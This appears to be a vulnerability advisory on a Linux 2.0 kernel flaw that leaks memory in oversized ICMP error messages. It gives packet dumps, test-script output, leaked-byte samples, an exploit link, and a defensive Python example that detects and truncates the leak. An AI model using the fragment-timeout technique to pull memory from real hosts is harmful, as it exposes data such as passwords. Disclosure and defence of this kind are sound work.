Linux 2.0 remote info leak from too big icmp citation

2003-06-09T13:03:15
ID OSVDB:2173
Type osvdb
Reporter OSVDB
Modified 2003-06-09T13:03:15

Description

Vulnerability Description

There is a flaw in the Linux 2.0 through 2.0.39 kernel's IP stack implementation in how it handles ICMP errors. This flaw causes the machine to return too much information in the return ICMP packet including passwords.

Vulnerable products

Any Linux 2.0 kernel up to and including 2.0.39
Watchguard Firebox II

Any appliance (firewall, proxy, etc.) that uses Linux 2.0 <= 2.0.39

Vulnerable:

./icmpleaktest.py 192.168.11.2

Packet sent. Answer should take 31s. Interrupt with C-c
Got '\x95\x03\x1a\x10Ji\xfb\xba\xd0\xc5Q\x14\x877\xbd\x8a;\xb3^\x7f'

Not vulnerable:

./icmpleaktest.py 172.16.1.40

Packet sent. Answer should take 31s. Interrupt with C-c
Got '

Vendor status

Linux 2.0.40 should be out soon. Watchguard said updated releases will follow.

These vendors said they are not vulnerable: Netscreen, Symantec, Novell, Clavister, Ingrian, StoneSoft, Sun

Example

We can send an IP fragment with the MF (More Fragments) flag set:

15:41:05 192.168.0.12.80 > 192.168.0.10.80: udp 4 (frag 52007:12@0+)
0x0000 4500 0020 cb27 2000 4011 0e3f c0a8 000c E....'..@..?....
0x0010 c0a8 000a 0050 0050 000c cd1e 5858 5858 .....P.P....XXXX

We wait 30 s for the reassembly to time out and the target to report it:

15:41:35 192.168.0.10 > 192.168.0.12: icmp: ip reassembly time exceeded [tos 0xc0]
0x0000 45c0 0050 dcca 0000 4001 1bbc c0a8 000a E..P....@.......
0x0010 c0a8 000c 0b01 aa24 0000 0000 4500 0020 .......$....E...
0x0020 cb27 2000 4011 0e3f c0a8 000c c0a8 000a .'..@..?........
0x0030 0050 0050 000c cd1e 5858 5858 0050 0050 .P.P....XXXX.P.P
0x0040 000c cd1e 5858 5858 207b 2d68 0000 0000 ....XXXX.{-h....

Bytes at offsets 0x3c to 0x4f are bonus: they lie beyond the end of the quoted original datagram (Total Length 0x20, starting at 0x1c), so they are memory the kernel copied but never received. It works with every ICMP error except port unreachable. It is possible to increase the amount of data leaked by adding IP options.

Examples of bonus bytes :

98 EA CD 03 10 58 CD 03 31 32 33 34 AA FF 55 00 .....X..1234..U.
98 86 0C 03 98 EC CD 03 10 58 CD 03 00 00 00 00 .........X......
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
58 EE CD 03 98 86 0C 03 98 EE CD 03 10 58 CD 03 X............X..
69 6E 66 6F 72 6D 61 74 69 6F 6E 00 4D 49 4E 46 information.MINF
00 00 00 00 00 00 00 00 AA FF 55 00 90 88 CC 03 ..........U.....
00 50 00 50 00 0C CD 1E 58 58 58 58 00 00 00 00 .P.P....XXXX....
2E 30 2E 25 75 2E 69 6E 2D 61 64 64 72 2E 61 72 .0.%u.in-addr.ar
90 12 CC 03 00 00 00 00 98 C0 B5 02 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
43 5F 4D 4F 4E 45 54 41 52 59 00 4C 43 5F 43 4F C_MONETARY.LC_CO
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
90 E2 CA 03 00 00 00 00 98 A0 CC 03 00 00 00 00 ................
00 50 00 50 00 0C CD 1E 58 58 58 58 00 00 00 00 .P.P....XXXX....
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 18 5F FF 00 00 00 00 00 14 00 00 00 ....._..........
73 69 6E 6C 00 2E 67 6E 75 2E 77 61 72 6E 69 6E sinl..gnu.warnin
70 9E 09 40 60 9E 09 40 E0 9A 08 40 A0 9F 08 40 p..@`..@...@...@
68 01 00 00 41 46 00 00 67 01 00 00 41 4C 00 00 h...AF..g...AL..
FF FF FF FF FF FF FF FF E2 00 00 00 4A 00 00 00 ............J...
61 67 65 2D 72 65 74 75 72 6E 00 53 49 00 53 4F age-return.SI.SO
61 73 68 00 7A 65 72 6F 00 6F 6E 65 00 74 77 6F ash.zero.one.two
0D 00 00 00 01 00 00 00 0E 00 00 00 01 00 00 00 ................
01 00 00 00 2D 00 00 00 01 00 00 00 2E 00 00 00 ....-...........
4C 00 00 00 01 00 00 00 4D 00 00 00 01 00 00 00 L.......M.......
01 00 00 00 6C 00 00 00 01 00 00 00 6D 00 00 00 ....l.......m...
4C 43 5F 41 4C 4C 00 4C 43 5F 4D 45 53 53 41 47 LC_ALL.LC_MESSAG

Solution Description

Check with your vendor for an official update. There is an unofficial patch at http://www.cartel-securite.fr/pbiondi/patches/icmpleak.patch

Workarounds include filtering ICMP messages at the perimeter and truncating outbound ICMP error messages at the RFC limits (original IP header plus 8 bytes of data).
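The following Python is an added example, not the advisory's icmpleaktest.py nor any vendor's code. Working from the defender's side, it takes the ICMP "ip reassembly time exceeded" reply shown in the Example section (reconstructed from the page's hex dump) and measures how far the quoted datagram runs past the original datagram's Total Length, which locates the same 20 bonus bytes at offsets 0x3c to 0x4f; it then applies the workaround of truncating the error message at the RFC 792 limit (IP header plus 8 bytes) and recomputes both checksums so the shortened message stays valid. The function names, the ICMP_ERROR_TYPES set and the RFC792_QUOTE constant are this example's own, and nothing is sent on the network.

```python
import struct

# Constructed sample: the 80-byte ICMP "ip reassembly time exceeded" reply
# from the advisory's tcpdump hex dump (offsets 0x0000-0x004f): 20-byte IP
# header, 8-byte ICMP header, then the quoted (cited) original datagram.
_HEX = (
    "45c0 0050 dcca 0000 4001 1bbc c0a8 000a "
    "c0a8 000c 0b01 aa24 0000 0000 4500 0020 "
    "cb27 2000 4011 0e3f c0a8 000c c0a8 000a "
    "0050 0050 000c cd1e 5858 5858 0050 0050 "
    "000c cd1e 5858 5858 207b 2d68 0000 0000"
)
ICMP_ERROR = bytes.fromhex(_HEX.replace(" ", ""))

# ICMP types that carry a quoted copy of the offending datagram (RFC 792):
# destination unreachable, source quench, redirect, time exceeded, parameter problem.
ICMP_ERROR_TYPES = {3, 4, 5, 11, 12}
RFC792_QUOTE = 8  # RFC 792: quote the original IP header plus 64 bits of its data


def inet_checksum(data):
    """Standard one's-complement checksum used by the IP and ICMP headers."""
    if len(data) % 2:
        data = bytes(data) + b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def checksums_ok(pkt):
    """True when both the IP header checksum and the ICMP checksum verify."""
    ihl = (pkt[0] & 0x0F) * 4
    total = struct.unpack("!H", pkt[2:4])[0]
    return inet_checksum(pkt[:ihl]) == 0 and inet_checksum(pkt[ihl:total]) == 0


def analyze_icmp_error(pkt):
    """Measure how much of the offending datagram an ICMP error quotes.

    Anything quoted beyond the original datagram's own Total Length was never
    part of that datagram: it is memory the sender should not have copied.
    """
    ihl = (pkt[0] & 0x0F) * 4
    total = struct.unpack("!H", pkt[2:4])[0]
    pkt = pkt[:total]                       # ignore any link-layer trailer
    if pkt[9] != 1:
        raise ValueError("not an ICMP packet")
    icmp_type, icmp_code = pkt[ihl], pkt[ihl + 1]
    if icmp_type not in ICMP_ERROR_TYPES:
        raise ValueError("not an ICMP error message")
    quote_off = ihl + 8                     # quoted datagram follows the ICMP header
    inner = pkt[quote_off:]
    inner_ihl = (inner[0] & 0x0F) * 4
    original_len = struct.unpack("!H", inner[2:4])[0]
    excess = max(0, len(inner) - original_len)
    return {
        "icmp_type": icmp_type,
        "icmp_code": icmp_code,
        "quoted_bytes": len(inner),
        "original_len": original_len,
        "rfc792_limit": inner_ihl + RFC792_QUOTE,
        "excess_bytes": excess,
        "excess_offset": quote_off + original_len if excess else None,
        "excess": inner[original_len:],     # the "bonus" bytes, empty if none
    }


def truncate_to_rfc792(pkt):
    """Workaround from the advisory: cut the quoted datagram back to the RFC 792
    limit (header + 8 bytes) and fix both checksums so the message stays valid."""
    info = analyze_icmp_error(pkt)
    ihl = (pkt[0] & 0x0F) * 4
    limit = min(info["rfc792_limit"], info["original_len"])
    keep = ihl + 8 + limit
    if len(pkt) <= keep:
        return bytes(pkt)
    out = bytearray(pkt[:keep])
    struct.pack_into("!H", out, 2, keep)                            # new IP total length
    struct.pack_into("!H", out, 10, 0)
    struct.pack_into("!H", out, 10, inet_checksum(out[:ihl]))       # IP header checksum
    struct.pack_into("!H", out, ihl + 2, 0)
    struct.pack_into("!H", out, ihl + 2, inet_checksum(out[ihl:]))  # ICMP checksum
    return bytes(out)


if __name__ == "__main__":
    info = analyze_icmp_error(ICMP_ERROR)
    print("ICMP type %d code %d quotes %d bytes of a %d-byte datagram"
          % (info["icmp_type"], info["icmp_code"], info["quoted_bytes"], info["original_len"]))
    if info["excess_bytes"]:
        print("%d bonus bytes at offset 0x%02x: %s"
              % (info["excess_bytes"], info["excess_offset"], info["excess"].hex()))
    fixed = truncate_to_rfc792(ICMP_ERROR)
    print("truncated to %d bytes, checksums ok: %s" % (len(fixed), checksums_ok(fixed)))
```

The excess test is deliberately the original datagram's Total Length rather than the RFC 792 limit: RFC 1812 lets a router quote more than header plus 8 bytes, so a longer quotation is not by itself a fault, but bytes past the datagram's own declared length can only be uninitialised or stale memory, which is the condition this advisory describes. On the sample packet the function reports ICMP type 11 code 1 with 20 excess bytes starting at 0x3c, and the truncated message shrinks to 56 bytes with valid checksums.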

Short Description

There is a flaw in the Linux 2.0 through 2.0.39 kernel's IP stack implementation in how it handles ICMP errors. This flaw causes the machine to return too much information in the return ICMP packet including passwords.

References:

ISS X-Force ID: 12223
Generic Informational URL: http://www.cartel-securite.fr/pbiondi/adv/CARTSA-20030314-icmpleak.txt
Generic Exploit URL: http://www.cartel-securite.fr/pbiondi/python/icmpleaktest.py
CVE-2003-0418
CERT VU: 471084